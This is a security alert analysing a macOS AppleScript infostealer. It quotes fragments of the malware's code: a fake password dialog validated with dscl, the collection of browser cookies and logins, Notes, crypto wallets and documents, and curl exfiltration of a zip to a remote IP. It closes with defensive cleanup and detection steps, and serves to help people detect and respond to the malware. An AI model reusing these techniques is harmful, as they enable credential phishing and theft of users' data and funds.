Security Alert MacOS Malware.

Security Alert: "Open Gatekeeper Friendly" Malware Detected

Analysis of Malicious AppleScript Payload

This script is a malicious payload designed to collect sensitive user data, bundle it into a compressed file, and exfiltrate it to a remote server. Below is a detailed breakdown of its functionality and behavior:

Script Behavior

1. Initialization
Temporary Directory Setup:

set randomNumber to do shell script "echo $((RANDOM % 9000 + 1000))"
set writemind to "/tmp/" & randomNumber & "/"
mkdir(writemind)

- Creates a random directory in /tmp to stage collected data.

System Information Collection:

set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
writeText(result, writemind & "info")

- Gathers macOS version, hardware details, and display information.

2. User Data Collection
Browsers:

set chromiumMap to {{"Chrome", library & "Google/Chrome/"}, ...}
chromium(writemind, chromiumMap)

- Targets Chrome, Brave, Edge, Opera, and similar browsers to collect:
- Cookies
- Login data
- Browser profiles.

Notes and Safari:

readwrite2(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite", ...)

- Copies SQLite databases storing Notes and Safari cookies.

Cryptocurrency Wallets:

set walletMap to {{"deskwallets/Electrum", profile & "/.electrum/wallets/"}, ...}
deskwallets(writemind, walletMap)

- Looks for wallets like Electrum, Monero, and others to exfiltrate private keys.

Generic Files:

filegrabber(writemind)

- Searches Desktop, Documents, and Downloads for files with extensions like .txt, .pdf, .docx, .wallet, etc.

3. Data Compression
- Bundles collected data into a zip file:

do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/out.zip"

4. Data Exfiltration
- Sends the zip file to a remote server:

send_data(0)

- The send_data function uses curl to POST the zip file to 

http://81.19.135.54/joinsystem

.

5. Cleanup
- Deletes the temporary directory and zip file:

do shell script "rm -r " & writemind
do shell script "rm /tmp/out.zip"

Key Functionalities

Password Handling
- The script attempts to collect the user's password via a deceptive dialog box:

display dialog "Required Application Helper.\nPlease enter password for continue."

- If the user provides a password, it validates it using dscl . authonly.

Repeated Attempts
- If the password prompt fails, the script loops indefinitely, attempting to trick the user into entering it.

Retry Logic for Data Upload
- The send_data function retries up to 40 times if the upload fails:

if attempt < 40 then
delay 3
send_data(attempt + 1)
end if

What Happens if Interrupted?
1. Before Compression:
- Data will remain in /tmp/<randomNumber> but won't be sent.
- Look for remnants in /tmp.

2. During Compression:
- /tmp/out.zip may exist but will be incomplete.

3. During Upload:
- If curl is interrupted, the server may receive a partial or no file.

4. After Upload:
- If the upload succeeds, the script will clean up traces by deleting /tmp/<randomNumber> and /tmp/out.zip.

Recommendations

Inspect Temporary Files
- Check /tmp for remnants:

ls -la /tmp/

Search for curl Logs
- Look for evidence of upload activity:

grep -i "81.19.135.54" /var/log/system.log

Kill Suspicious Processes
- Ensure no part of the script is running:

ps aux | grep osascript
ps aux | grep curl

Secure Your System
- Change passwords for any potentially compromised accounts.
- Use antivirus software to scan for lingering threats.